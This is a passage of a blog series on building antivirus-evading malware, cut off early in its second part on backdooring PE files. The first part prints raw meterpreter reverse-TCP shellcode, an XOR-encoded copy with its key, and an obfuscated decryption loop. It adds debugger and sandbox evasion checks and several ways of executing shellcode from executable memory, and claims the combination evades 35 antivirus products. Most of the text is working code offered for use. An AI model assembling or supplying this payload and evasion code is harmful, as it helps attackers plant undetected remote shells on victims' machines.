Art of Anti Detection


Art of Anti Detection 1 – Introduction to AV & Detection Techniques
This blog post explains effective methods for bypassing the static, dynamic and heuristic
analysis of up-to-date antivirus products. Some of the methods are already publicly known,
but a few methods and implementation tricks are the key to generating FUD (Fully
Undetectable) malware. The size of the malware is almost as important as anti detection, so
I will try to keep the size as small as possible when implementing these methods. This paper
also explains the inner workings of antivirus products and the Windows operating system.
Readers should have at least intermediate C/C++ and assembly knowledge and a decent
understanding of the PE file structure.

Introduction
Anti detection techniques should be implemented specifically for each malware type. All the
methods explained in this paper also work for other kinds of malware, but the paper mainly
focuses on stager meterpreter payloads because meterpreter is capable of everything that
other malware does. Getting a meterpreter session on a remote machine allows privilege
escalation, credential stealing, process migration, registry manipulation and a lot more
post exploitation. Meterpreter also has a very active community and is very popular among
security researchers.

Terminology
Signature Based Detection:
Traditional antivirus software relies heavily upon signatures to identify malware.
Substantially, when a malware arrives in the hands of an antivirus firm, it is analysed by
malware researchers or by dynamic analysis systems. Then, once it is determined to be a
malware, a proper signature of the file is extracted and added to the signatures database of
the antivirus software.[1]
Static Program Analysis:
Static program analysis is the analysis of computer software that is performed without
actually executing programs. In most cases the analysis is performed on some version of the
source code, and in the other cases on some form of the object code.[2]
Dynamic Program Analysis:
Dynamic program analysis is the analysis of computer software that is performed by
executing programs on a real or virtual processor. For dynamic program analysis to be
effective, the target program must be executed with sufficient test inputs to produce
interesting behavior.[3]
Sandbox:
In computer security, a sandbox is a security mechanism for separating running programs.
It is often used to execute untested or untrusted programs or code, possibly from
unverified or untrusted third parties, suppliers, users or websites, without risking harm to
the host machine or operating system.[4]
Heuristic Analysis:
Heuristic analysis is a method employed by many computer antivirus programs designed to
detect previously unknown computer viruses, as well as new variants of viruses already in
the “wild”. Heuristic analysis is an expert-based analysis that determines the susceptibility
of a system towards a particular threat/risk using various decision rules or weighing methods.
MultiCriteria analysis (MCA) is one of the means of weighing. This method differs from
statistical analysis, which bases itself on the available data/statistics.[5]
Entropy:
In computing, entropy is the randomness collected by an operating system or application
for use in cryptography or other uses that require random data. This randomness is often
collected from hardware sources, either pre-existing ones such as mouse movements or
specially provided randomness generators. A lack of entropy can have a negative impact on
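performance and security.[6]
In the rest of this paper the term is used in the information-theoretic sense: the measured
randomness of the bytes in a file. Compressed or encrypted data has high entropy, which is
why scanners treat an unusually high value as a sign of packing or encryption.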
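File entropy, as a scanner would measure it, is usually expressed as Shannon entropy over
byte values, in bits per byte. The sketch below is only an illustration of that measurement;
the function name shannon_entropy is an assumption and is not taken from any AV product.

```cpp
#include <array>
#include <cmath>
#include <cstddef>
#include <cstdint>
#include <vector>

// Shannon entropy of a byte buffer in bits per byte (0.0 to 8.0).
// Hypothetical helper for illustration; real scanners may measure per section.
double shannon_entropy(const std::vector<std::uint8_t>& data) {
    if (data.empty()) return 0.0;

    std::array<std::size_t, 256> counts{};  // occurrences of each byte value
    for (std::uint8_t b : data) ++counts[b];

    const double n = static_cast<double>(data.size());
    double entropy = 0.0;
    for (std::size_t c : counts) {
        if (c == 0) continue;               // unused byte values contribute nothing
        const double p = static_cast<double>(c) / n;
        entropy -= p * std::log2(p);
    }
    return entropy;
}
```

A buffer that repeats a single byte scores 0, while a buffer in which all 256 byte values
occur equally often scores the maximum of 8. Plain code and text sit well below that
maximum, and encrypted or compressed data sits close to it.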

Common Techniques
When it comes to reducing a malware’s detection score, the first things that come to mind are
crypters, packers and code obfuscation. These tools and techniques can still bypass a good
number of AV products, but because of advancements in the cyber security field most of the
tools and methods in the wild are outdated and can’t produce FUD malware. To explain the
inner workings of these techniques and tools I will give brief descriptions:
Obfuscation:
Code obfuscation can be defined as scrambling the code of a binary without disrupting its
real function. It makes static analysis harder and also changes the hash signatures of the
binary. Obfuscation can be implemented simply by adding a few lines of garbage code or by
programmatically changing the execution order of the instructions. This method can bypass a
good number of AV products, but it depends on how much you obfuscate.
Packers:
An executable packer is any means of compressing an executable file and combining the
compressed data with decompression code into a single executable. When this compressed
executable is executed, the decompression code recreates the original code from the
compressed code before executing it. In most cases this happens transparently so the
compressed executable can be used in exactly the same way as the original. When an AV
scanner scans packed malware it needs to determine the compression algorithm and
decompress it. Because packed files are harder to analyze, malware authors have a keen
interest in packers.
Crypters:
Crypters are programs that encrypt a given binary to make it hard to analyze or reverse
engineer. A crypter consists of two parts, a builder and a stub. The builder simply encrypts
the given binary and places it inside the stub. The stub is the most important piece of the
crypter: when the generated binary is executed, the stub runs first, decrypts the original
binary into memory and then executes it in memory, in most cases via the “RunPE” method.

The Problem About Crypters & Packers


Before moving on to the effective methods, a few things need to be acknowledged about what
is wrong with the well-known techniques and tools. Today’s AV companies have already
realized the danger: instead of just searching for malware signatures and harmful behavior,
they also search for signs of crypters and packers. Compared to detecting malware, detecting
crypters and packers is relatively easy because they all have to do certain suspicious
things, like decrypting the encrypted PE file and executing it in memory.
PE Injection:
In order to fully explain the in-memory execution of a PE image I have to talk about how
Windows loads PE files. Generally, when a PE file is built the linker sets the preferred
base address of the main module to 0x00400000. During the build, all full address pointers
and the addresses in long jump instructions are calculated according to this base address.
At the end of the build a relocation section is created in the PE file; it contains the
addresses of the instructions that depend on the base address of the image, such as full
address pointers and long jump instructions.
When the PE image is executed, the operating system checks the availability of the image’s
preferred address space. If the preferred space is not available, the operating system
loads the PE image at another available address in memory. Before starting the process, the
system loader needs to adjust the absolute addresses in memory: with the help of the
relocation section it fixes all address-dependent instructions and then starts the
suspended process. This mechanism is called base relocation, and it is what allows “Address
Space Layout Randomization” to load an image at a random base address.[7]
In order to execute a PE image in memory, crypters need to parse the PE headers and
relocate the absolute addresses. In short, they have to mimic the system loader, which is
very unusual and suspicious. When we analyze crypters written in C or higher level
languages, in almost every case we see the Windows API functions “NtUnmapViewOfSection” and
“ZwUnmapViewOfSection” being called. These functions simply unmap a view of a section from
the virtual address space of a subject process, and they play a very important role in the
in-memory execution method called RunPE, which almost 90% of crypters use.

1. xNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA("ntdll.dll"),
"NtUnmapViewOfSection"));
2. xNtUnmapViewOfSection(PI.hProcess, PVOID(dwImageBase));

Of course AV products can’t just declare every program that uses these Windows API functions
malicious, but the order in which the functions are used matters a lot. A small percentage
of crypters (mostly written in assembly) do not use these functions and perform the
relocation manually. They are very effective for now, but sooner or later using crypters
will not be profitable, because logically no harmless program tries to mimic the system
loader. Another downside is the huge entropy increase in input files: because the entire PE
file is encrypted, entropy will inevitably rise, and when AV scanners detect unusual entropy
in a PE file they will probably mark the file as suspicious.

Perfect Approach
The concept of encrypting the malicious code is clever, but the decryption function should
be obfuscated properly, and when it comes to executing the decrypted code in memory we have
to do it without relocating the absolute addresses. There also has to be a detection
mechanism that checks whether the malware is being analyzed dynamically in a sandbox. If the
detection mechanism detects that the malware is being analyzed by the AV, the decryption
function shouldn’t be executed. Instead of encrypting the entire PE file, encrypting
shellcode or only the .text section of the binary is much more suitable: it keeps the
entropy and size low and makes no changes to image headers and sections.
This will be the malware flow chart.

Our “AV Detect” function will detect whether the malware is being analyzed dynamically in a
sandbox. If the function detects any sign of an AV scanner it will call the main function
again or just crash; if the “AV Detect” function doesn’t find any sign of an AV scanner it
will call the “Decrypt Shellcode” function.
This is meterpreter reverse tcp shellcode in raw format.

1. unsigned char Shellcode[] = {


2. 0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xc0, 0x64,
3. 0x8b, 0x50, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28,
4. 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c,
5. 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf2, 0x52, 0x57, 0x8b, 0x52,
6. 0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78, 0xe3, 0x48, 0x01, 0xd1,
7. 0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49, 0x18, 0xe3, 0x3a, 0x49,
8. 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0xac, 0xc1, 0xcf, 0x0d, 0x01,
9. 0xc7, 0x38, 0xe0, 0x75, 0xf6, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75,
10. 0xe4, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b,
11. 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24,
12. 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x5f, 0x5f, 0x5a,
13. 0x8b, 0x12, 0xeb, 0x8d, 0x5d, 0x68, 0x33, 0x32, 0x00, 0x00, 0x68, 0x77,
14. 0x73, 0x32, 0x5f, 0x54, 0x68, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0xb8,
15. 0x90, 0x01, 0x00, 0x00, 0x29, 0xc4, 0x54, 0x50, 0x68, 0x29, 0x80, 0x6b,
16. 0x00, 0xff, 0xd5, 0x6a, 0x05, 0x68, 0x7f, 0x00, 0x00, 0x01, 0x68, 0x02,
17. 0x00, 0x11, 0x5c, 0x89, 0xe6, 0x50, 0x50, 0x50, 0x50, 0x40, 0x50, 0x40,
18. 0x50, 0x68, 0xea, 0x0f, 0xdf, 0xe0, 0xff, 0xd5, 0x97, 0x6a, 0x10, 0x56,
19. 0x57, 0x68, 0x99, 0xa5, 0x74, 0x61, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0x0c,
20. 0xff, 0x4e, 0x08, 0x75, 0xec, 0x68, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5,
21. 0x6a, 0x00, 0x6a, 0x04, 0x56, 0x57, 0x68, 0x02, 0xd9, 0xc8, 0x5f, 0xff,
22. 0xd5, 0x8b, 0x36, 0x6a, 0x40, 0x68, 0x00, 0x10, 0x00, 0x00, 0x56, 0x6a,
23. 0x00, 0x68, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x93, 0x53, 0x6a, 0x00,
24. 0x56, 0x53, 0x57, 0x68, 0x02, 0xd9, 0xc8, 0x5f, 0xff, 0xd5, 0x01, 0xc3,
25. 0x29, 0xc6, 0x75, 0xee, 0xc3
26. };

To keep the entropy and size at appropriate values I will pass this shellcode through a
simple xor cipher with a multi-byte key. Xor is not an encryption standard like RC4 or
Blowfish, but we don’t need strong encryption anyway: AV products are not going to try to
decrypt the shellcode, so making it unreadable and undetectable for static string analysis
is enough. Using xor also makes the decryption process much faster, and avoiding encryption
libraries in the code reduces the size a lot.
This is the same meterpreter code xor ciphered with the key.

1. unsigned char Shellcode[] = {


2. 0xfb, 0xcd, 0x8d, 0x9e, 0xba, 0x42, 0xe1, 0x93, 0xe2, 0x14, 0xcf, 0xfa,
3. 0x31, 0x12, 0xb1, 0x91, 0x55, 0x29, 0x84, 0xcc, 0xae, 0xc9, 0xf3, 0x32,
4. 0x08, 0x92, 0x45, 0xb8, 0x8b, 0xbd, 0x2d, 0x26, 0x66, 0x59, 0x0d, 0xb2,
5. 0x9a, 0x83, 0x4e, 0x17, 0x06, 0xe2, 0xed, 0x6c, 0xe8, 0x15, 0x0a, 0x48,
6. 0x17, 0xae, 0x45, 0xa2, 0x31, 0x0e, 0x90, 0x62, 0xe4, 0x6d, 0x0e, 0x4f,
7. 0xeb, 0xc9, 0xd8, 0x3a, 0x06, 0xf6, 0x84, 0xd7, 0xa2, 0xa1, 0xbb, 0x53,
8. 0x8c, 0x11, 0x84, 0x9f, 0x6c, 0x73, 0x7e, 0xb6, 0xc6, 0xea, 0x02, 0x9f,
9. 0x7d, 0x7a, 0x61, 0x6f, 0xf1, 0x26, 0x72, 0x66, 0x81, 0x3f, 0xa5, 0x6f,
10. 0xe3, 0x7d, 0x84, 0xc6, 0x9e, 0x43, 0x52, 0x7c, 0x8c, 0x29, 0x44, 0x15,
11. 0xe2, 0x5e, 0x80, 0xc9, 0x8c, 0x21, 0x84, 0x9f, 0x6a, 0xcb, 0xc5, 0x3e,
12. 0x23, 0x7e, 0x54, 0xff, 0xe3, 0x18, 0xd0, 0xe5, 0xe7, 0x7a, 0x50, 0xc4,
13. 0x31, 0x50, 0x6a, 0x97, 0x5a, 0x4d, 0x3c, 0xac, 0xba, 0x42, 0xe9, 0x6d,
14. 0x74, 0x17, 0x50, 0xca, 0xd2, 0x0e, 0xf6, 0x3c, 0x00, 0xda, 0xda, 0x26,
15. 0x2a, 0x43, 0x81, 0x1a, 0x2e, 0xe1, 0x5b, 0xce, 0xd2, 0x6b, 0x01, 0x71,
16. 0x07, 0xda, 0xda, 0xf4, 0xbf, 0x2a, 0xfe, 0x1a, 0x07, 0x24, 0x67, 0x9c,
17. 0xba, 0x53, 0xdd, 0x93, 0xe1, 0x75, 0x5f, 0xce, 0xea, 0x02, 0xd1, 0x5a,
18. 0x57, 0x4d, 0xe5, 0x91, 0x65, 0xa2, 0x7e, 0xcf, 0x90, 0x4f, 0x1f, 0xc8,
19. 0xed, 0x2a, 0x18, 0xbf, 0x73, 0x44, 0xf0, 0x4b, 0x3f, 0x82, 0xf5, 0x16,
20. 0xf8, 0x6b, 0x07, 0xeb, 0x56, 0x2a, 0x71, 0xaf, 0xa5, 0x73, 0xf0, 0x4b,
21. 0xd0, 0x42, 0xeb, 0x1e, 0x51, 0x72, 0x67, 0x9c, 0x63, 0x8a, 0xde, 0xe5,
22. 0xd2, 0xae, 0x39, 0xf4, 0xfa, 0x2a, 0x81, 0x0a, 0x07, 0x25, 0x59, 0xf4,
23. 0xba, 0x2a, 0xd9, 0xbe, 0x54, 0xc0, 0xf0, 0x4b, 0x29, 0x11, 0xeb, 0x1a,
24. 0x51, 0x76, 0x58, 0xf6, 0xb8, 0x9b, 0x49, 0x45, 0xf8, 0xf0, 0x0e, 0x5d,
25. 0x93, 0x84, 0xf4, 0xf4, 0xc4
26. };
27.
28. unsigned char Key[] = {
29. 0x07, 0x25, 0x0f, 0x9e, 0xba, 0x42, 0x81, 0x1a
30. };

Because we are writing a new piece of malware, its hash signature will not be known by
antivirus products, so we don’t need to worry about signature based detection. We will
encrypt our shellcode and obfuscate our anti detection/anti reverse engineering and
decryption functions; these will be enough for bypassing the static/heuristic analysis
phase. There is only one more phase we need to bypass, the dynamic analysis phase, and the
most important part there is the success of the “AV Detect” function. Before starting to
write the function we need to understand how the heuristic engines of AV products work.

Heuristic Engines
Heuristic engines are basically statistical and rule based analysis mechanisms. Their main
purpose is detecting new generation (previously unknown) viruses by categorizing code
fragments and giving them threat/risk grades according to predefined criteria. Even when a
simple hello world program is scanned by an AV product, the heuristic engine decides on a
threat/risk score; if the score is higher than the threshold, the file gets marked as
malicious. Heuristic engines are the most advanced part of AV products and they use a
significant number of rules and criteria. Since no antivirus company releases blueprints or
documentation about its heuristic engine, all known criteria of their threat/risk grading
policies have been found by trial and error.
Some of the known rules about threat grading:
– Decryption loop detected
– Reads active computer name
– Reads the cryptographic machine GUID
– Contacts random domain names
– Reads the windows installation date
– Drops executable files
– Found potential IP address in binary memory
– Modifies proxy settings
– Installs hooks/patches the running process
– Injects into explorer
– Injects into remote process
– Queries process information
– Sets the process error mode to suppress error box
– Unusual entropy
– Possibly checks for the presence of antivirus engine
– Monitors specific registry key for changes
– Contains ability to elevate privileges
– Modifies software policy settings
– Reads the system/video BIOS version
– Entry point in PE header is within an uncommon section
– Creates guarded memory regions
– Spawns a lot of processes
– Tries to sleep for a long time
– Unusual sections
– Reads windows product id
– Contains decryption loop
– Contains ability to start/interact device drivers
– Contains ability to block user input
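
The grading idea described above can be pictured as a weighted sum compared against a
threshold. The sketch below is purely illustrative: the Indicator type, the function names
and every weight and threshold value are assumptions, since no vendor documents its real
rules or numbers.

```cpp
#include <string>
#include <vector>

// One triggered rule and the hypothetical weight assigned to it.
struct Indicator {
    std::string name;
    int weight;
};

// Total threat/risk score: the sum of the weights of all triggered rules.
int threat_score(const std::vector<Indicator>& observed) {
    int score = 0;
    for (const Indicator& i : observed) score += i.weight;
    return score;
}

// A file is marked malicious when its score is higher than the threshold.
bool is_flagged(const std::vector<Indicator>& observed, int threshold) {
    return threat_score(observed) > threshold;
}
```

With assumed weights of 30 for “Unusual entropy”, 40 for “Contains decryption loop” and 20
for “Tries to sleep for a long time”, the total is 90, which exceeds an assumed threshold
of 70, whereas a file that only triggers a low-weight rule stays below it.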

When writing our AV Detect and Decrypt Shellcode functions we have to be careful about all
these rules.
Decrypt Shellcode:
Obfuscating the decryption mechanism is vital, because most AV heuristic engines are able to
detect decryption loops inside PE files. After the huge increase in ransomware cases, some
heuristic engines are even built mainly for finding encryption/decryption routines. After
they detect a decryption routine, some scanners wait until the ECX register reaches “0”,
which most of the time indicates the end of the loop. After they reach the end of the
decryption loop they re-analyze the decrypted content of the file.
This will be the “Decrypt Shellcode” function:

1. void DecryptShellcode() {
2. for (int i = 0; i < sizeof(Shellcode); i++) {
3.
4. __asm
5. {
6. PUSH EAX
7. XOR EAX, EAX
8. JZ True1
9. __asm __emit(0xca)
10. __asm __emit(0x55)
11. __asm __emit(0x78)
12. __asm __emit(0x2c)
13. __asm __emit(0x02)
14. __asm __emit(0x9b)
15. __asm __emit(0x6e)
16. __asm __emit(0xe9)
17. __asm __emit(0x3d)
18. __asm __emit(0x6f)
19.
20. True1:
21. POP EAX
22. }
23.
24.
25. Shellcode[i] = (Shellcode[i] ^ Key[(i % sizeof(Key))]);
26.
27.
28.
29. __asm
30. {
31. PUSH EAX
32. XOR EAX, EAX
33. JZ True2
34. __asm __emit(0xd5)
35. __asm __emit(0xb6)
36. __asm __emit(0x43)
37. __asm __emit(0x87)
38. __asm __emit(0xde)
39. __asm __emit(0x37)
40. __asm __emit(0x24)
41. __asm __emit(0xb0)
42. __asm __emit(0x3d)
43. __asm __emit(0xee)
44. True2:
45. POP EAX
46. }
47. }
48. }

It is a for loop that performs a logical xor operation between a shellcode byte and a key
byte. The assembly blocks above and below it literally do nothing: they surround the xor
operation with random bytes and jump over them. Because we are not using any advanced
decryption mechanism, this will be enough for obfuscating the “Decrypt Shellcode” function.
Dynamic Analysis Detection:
While writing the sandbox detection mechanism we also need to obfuscate our methods; if the
heuristic engine detects any sign of anti reverse engineering methods it would be very bad
for the malware’s threat score.
Is Debugger Present:
Our first AV detection mechanism will check for a debugger in our process. There is a
Windows API function for this operation, IsDebuggerPresent(), which “Determines whether the
calling process is being debugged by a user-mode debugger.” We will not use it, because most
AV products monitor Win API calls and will probably detect this function and treat it as an
anti reverse engineering method. Instead of using the Win API function we will look at the
“BeingDebugged” byte in the PEB block.

1. // bool WINAPI IsDebuggerPresent(void);


2. __asm
3. {
4. CheckDebugger:
5. PUSH EAX // Save the EAX value to stack
6. MOV EAX, DWORD PTR FS : [0x18] // Get PEB structure address
7. MOV EAX, DWORD PTR[EAX + 0x30] // Get being debugged byte
8. CMP BYTE PTR[EAX + 2], 0 // Check if being debuged byte is set
9. JNE CheckDebugger // If debugger present check again
10. POP EAX // Put back the EAX value
11. }

With some inline assembly this piece of code points a pointer at the BeingDebugged byte in
the PEB block. If a debugger is present it checks again, pushing EAX on every pass, until
the stack overflows; the resulting exception closes the process, which is the shortest way
to exit the program. Manually checking the BeingDebugged byte will bypass a good number of
AV products, but some AV products have taken measures against this, so we need to obfuscate
the code to avoid static string analysis.

1. __asm
2. {
3. CheckDebugger:
4. PUSH EAX
5. MOV EAX, DWORD PTR FS : [0x18]
6. __asm
7. {
8. PUSH EAX
9. XOR EAX, EAX
10. JZ J
11. __asm __emit(0xea)
12. J:
13. POP EAX
14. }
15. MOV EAX, DWORD PTR[EAX + 0x30]
16. __asm
17. {
18. PUSH EAX
19. XOR EAX, EAX
20. JZ J2
21. __asm __emit(0xea)
22. J2:
23. POP EAX
24. }
25. CMP BYTE PTR[EAX + 2], 0
26. __asm
27. {
28. PUSH EAX
29. XOR EAX, EAX
30. JZ J3
31. __asm __emit(0xea)
32. J3:
33. POP EAX
34. }
35. JNE CheckDebugger
36. POP EAX
37. }

I have added a jump instruction after each operation. This will not affect our purpose, but
adding garbage bytes between jumps will obfuscate the code and avoid static string filters.
Load Fake Library:
In this method we will try to load a non-existent DLL at runtime. Normally when we try to
load a non-existent DLL the returned HINSTANCE is NULL, but some dynamic analysis mechanisms
in AV products allow such calls to succeed in order to further investigate the execution
flow of the program.

1. bool BypassAV(char const * argv[]) {


2. HINSTANCE DLL = LoadLibrary(TEXT("fake.dll"));
3. if (DLL != NULL) {
4. BypassAV(argv);
5. }

Get Tick Count:


In this method we will exploit the time deadline of AV products. In most cases AV scanners
are designed for end users; they need to be user friendly and suitable for daily usage,
which means they can’t spend too much time scanning files and need to scan them as quickly
as possible. At first malware developers used the “Sleep()” function to wait until the scan
completed, but nowadays this trick almost never works, because every AV product skips the
sleep function when it encounters one. We will use this against them. The code below uses a
Win API function called “GetTickCount()”, which “Retrieves the number of milliseconds that
have elapsed since the system was started, up to 49.7 days.” We will use it to get the time
passed since the OS booted, then try to sleep for 1 second. After the sleep function we
check whether it was skipped by comparing the two GetTickCount() values.

1. int Tick = GetTickCount();


2. Sleep(1000);
3. int Tac = GetTickCount();
4. if ((Tac - Tick) < 1000) {
5. return false;
6. }
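
The 49.7 day limit in the quoted documentation follows from GetTickCount() returning a
32-bit millisecond counter. The short calculation below shows where the figure comes from;
the constant and function names are assumptions made for this illustration.

```cpp
#include <cstdint>

// Number of distinct values of a 32-bit millisecond counter before it wraps to zero.
constexpr std::uint64_t kTickRange = 1ULL << 32;              // 4,294,967,296 ms
// Milliseconds in one day.
constexpr std::uint64_t kMsPerDay = 24ULL * 60 * 60 * 1000;   // 86,400,000 ms

// Days of uptime after which the counter wraps around (about 49.71).
constexpr double wrap_days() {
    return static_cast<double>(kTickRange) / static_cast<double>(kMsPerDay);
}
```

Dividing 4,294,967,296 by 86,400,000 gives roughly 49.71, which the documentation rounds to
49.7 days.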

Number Of Cores:
This method simply checks the number of processor cores on the system. Since AV products
can’t afford to allocate too many resources from the host computer, we can check the core
count to determine whether we are in a sandbox. Some AV products don’t even support
multi-core processing, so they shouldn’t be able to reserve more than 1 processor core for
their sandbox environment.

1. SYSTEM_INFO SysGuide;
2. GetSystemInfo(&SysGuide);
3. int CoreNum = SysGuide.dwNumberOfProcessors;
4. if (CoreNum < 2) {
5. return false;
6. }

Huge Memory Allocations:


This method also exploits the time deadline of each AV scan. We simply allocate nearly 100
MB of memory, fill it with NULL bytes and free it at the end.

1. char * Memdmp = NULL;


2. Memdmp = (char *)malloc(100000000);
3. if (Memdmp != NULL) {
4. memset(Memdmp, 00, 100000000);
5. free(Memdmp);
6. }

When the program’s memory starts to grow at runtime, AV scanners will eventually end the
scan so as not to spend too much time on a file. This method can be used multiple times. It
is a very primitive and old technique but it still bypasses a good number of scanners.
Trap Flag Manipulation:
The trap flag is used for tracing the program. If this flag is set, every instruction will
raise a “SINGLE_STEP” exception. The trap flag can be manipulated in order to thwart
tracers. We can manipulate the trap flag with the code below:

1. __asm
2. {
3. PUSHF // Push all flags to stack
4. MOV DWORD [ESP], 0x100 // Set 0x100 to the last flag on the stack
5. POPF // Put back all flags register values
6. }

Mutex Triggered WinExec:


This method is very promising because of its simplicity: we create a condition that checks
whether a certain mutex object already exists on the system.

1. HANDLE AmberMutex = CreateMutex(NULL, TRUE, "FakeMutex");


2. if(GetLastError() != ERROR_ALREADY_EXISTS){
3. WinExec(argv[0],0);
4. }

If the “CreateMutex” function does not return the already exists error we execute the
malware binary again. Since most AV products don’t let programs that are being dynamically
analyzed start new processes or access files outside the AV sandbox, the decrypt function
may start executing once the already exists error occurs. There are many more creative ways
of using mutexes in anti detection.
Proper Ways To Execute Shellcodes
Starting with Windows XP Service Pack 2, Microsoft introduced Data Execution Prevention or
DEP[8], a security feature that marks memory pages as non-executable unless they explicitly
contain code. If a program tries to run code from a page that is not marked executable, DEP
raises an exception and, unless it is handled, the program is closed. That means you can’t
just put some bytes into a char array and execute it; you need to allocate a memory region
with read, write and execute flags using Windows API functions.
Microsoft has several memory manipulation API functions for reserving memory pages. Most of
the common malware in the field uses the “VirtualAlloc” function for reserving memory
pages, and as you can guess, common usage of a function helps AV products define detection
rules. Using other memory manipulation functions will also do the trick and may attract
less attention.
I will list several shellcode execution methods with different memory manipulation API
functions:
HeapCreate/HeapAlloc:
Windows also allows creating RWE heap regions.

1. void ExecuteShellcode(){
2. HANDLE HeapHandle = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, sizeof(Shellcode), sizeof(Shellcode));
3. char * BUFFER = (char*)HeapAlloc(HeapHandle, HEAP_ZERO_MEMORY, sizeof(Shellcode));
4. memcpy(BUFFER, Shellcode, sizeof(Shellcode));
5. (*(void(*)())BUFFER)();
6. }

LoadLibrary/GetProcAddress:
The combination of the LoadLibrary and GetProcAddress Win API functions allows us to use all
other Win API functions. With this usage there will be no direct call to the memory
manipulation function and the malware will probably attract less attention.

1. void ExecuteShellcode(){
2. HINSTANCE K32 = LoadLibrary(TEXT("kernel32.dll"));
3. if(K32 != NULL){
4. MYPROC Allocate = (MYPROC)GetProcAddress(K32, "VirtualAlloc");
5. char* BUFFER = (char*)Allocate(NULL, sizeof(Shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
6. memcpy(BUFFER, Shellcode, sizeof(Shellcode));
7. (*(void(*)())BUFFER)();
8. }
9. }

GetModuleHandle/GetProcAddress:
This method does not even use the LoadLibrary function; it takes advantage of the already
loaded kernel32.dll. The GetModuleHandle function retrieves the module handle of an already
loaded DLL. This is possibly one of the most silent ways to execute shellcode.

1. void ExecuteShellcode(){
2. MYPROC Allocate = (MYPROC)GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualAlloc");
3. char* BUFFER = (char*)Allocate(NULL, sizeof(Shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
4. memcpy(BUFFER, Shellcode, sizeof(Shellcode));
5. (*(void(*)())BUFFER)();
6. }

Multi Threading
Multi-threaded PE files are always harder to reverse engineer, and they are also challenging
for AV products. The multi-threading approach can be used with all the execution methods
above: instead of just pointing a function pointer at the shellcode and executing it,
creating a new thread complicates things for AV scanners, and it allows us to keep executing
the “AV Detect” function while the shellcode runs at the same time.

1. void ExecuteShellcode(){
2. char* BUFFER = (char*)VirtualAlloc(NULL, sizeof(Shellcode), MEM_COMMIT,
PAGE_EXECUTE_READWRITE);
3. memcpy(BUFFER, Shellcode, sizeof(Shellcode));
4. CreateThread(NULL,0,LPTHREAD_START_ROUTINE(BUFFER),NULL,0,NULL);
5. while(TRUE){
6. BypassAV(argv);
7. }
8. }

The code above executes the shellcode by creating a new thread. Just after creating the
thread there is an infinite while loop that executes the bypass AV function. This approach
almost doubles the effect of our bypass AV function, which keeps checking for sandbox and
dynamic analysis signs while the shellcode runs. This is also vital for bypassing some
advanced heuristic engines that wait until the shellcode is executed.
Conclusion
Finally, a few more things need to be covered about compiling the malware. When compiling
the source, safeguards like stack savers need to be on, and stripping the symbols is vital
for making reverse engineering of our malware harder and for reducing its size. Compiling
with Visual Studio is recommended because of the inline assembly syntax used in this paper.
When all of these methods are combined, the generated malware is able to bypass 35 of the
most advanced AV products.
PoC
The Meterpreter created using the techniques described in this article shows how our
malware performs on real systems.

Sooner or later this method is also going to expire, but there will always be more ways to
bypass AV products.
References:
[1] – https://en.wikipedia.org/wiki/Antivirus_software
[2] – https://en.wikipedia.org/wiki/Static_program_analysis
[3] – https://en.wikipedia.org/wiki/Dynamic_program_analysis
[4] – https://en.wikipedia.org/wiki/Sandbox_(computer_security)
[5] – https://en.wikipedia.org/wiki/Heuristic_analysis
[6] – https://en.wikipedia.org/wiki/Entropy
[7] – https://en.wikipedia.org/wiki/Address_space_layout_randomization
[8] – https://msdn.microsoft.com/en-us/library/windows/desktop/aa366553(v=vs.85).aspx
The Antivirus Hacker’s Handbook
The Rootkit Arsenal: Escape and Evasion in the Dark Corners of the System
http://venom630.free.fr/pdf/Practical_Malware_Analysis.pdf
http://pferrie.host22.com/papers/antidebug.pdf
https://www.symantec.com/connect/articles/windows-anti-debug-reference
https://www.exploit-db.com/docs/18849.pdf
http://blog.sevagas.com/?Fun-combining-anti-debugging-and
Art of Anti Detection 2 – PE Backdoor Manufacturing
This paper explains several methods for placing backdoors in PE (Portable Executable) files
for red team purposes. In order to fully grasp its content, readers need to have at least
intermediate x86 assembly knowledge, familiarity with debuggers and a decent understanding
of the PE file format.

Introduction
Nowadays almost all security researchers, pentesters and malware analysts deal with
backdoors on a daily basis. Placing a backdoor in a system, or specifically in a program, is
the most popular way of maintaining access. The majority of this paper’s content is about
methods for implanting backdoors in 32 bit PE files, but since the PE file format is a
modified version of Unix COFF (Common Object File Format), the logic behind the methods can
be applied to all other executable binary file types. The stealthiness of the implanted
backdoor is also very important for staying longer in the systems, so the methods explained
in this paper are designed to get the lowest possible detection rate. Before moving further,
reading the first article of the Art Of Anti Detection series, Introduction To AV &
Detection Techniques, would be very helpful for understanding the inner workings of AV
products and the fundamentals of anti detection.

Terminology
Red Team Pentesting: When used in a hacking context, a red team is a group of white-
hat hackers that attack an organization’s digital infrastructure as an attacker would in order
to test the organization’s defenses (often known as “penetration testing”). Companies
including Microsoft perform regular exercises under which both red and blue teams are
utilized. Benefits include challenges to preconceived notions and clarifying the problem
state that planners are attempting to mitigate. More accurate understanding can be
developed of how sensitive information is externalized and of exploitable patterns and
instances of bias.
Address space layout randomization: (ASLR) is a computer security technique involved
in protection from buffer overflow attacks. In order to prevent an attacker from reliably
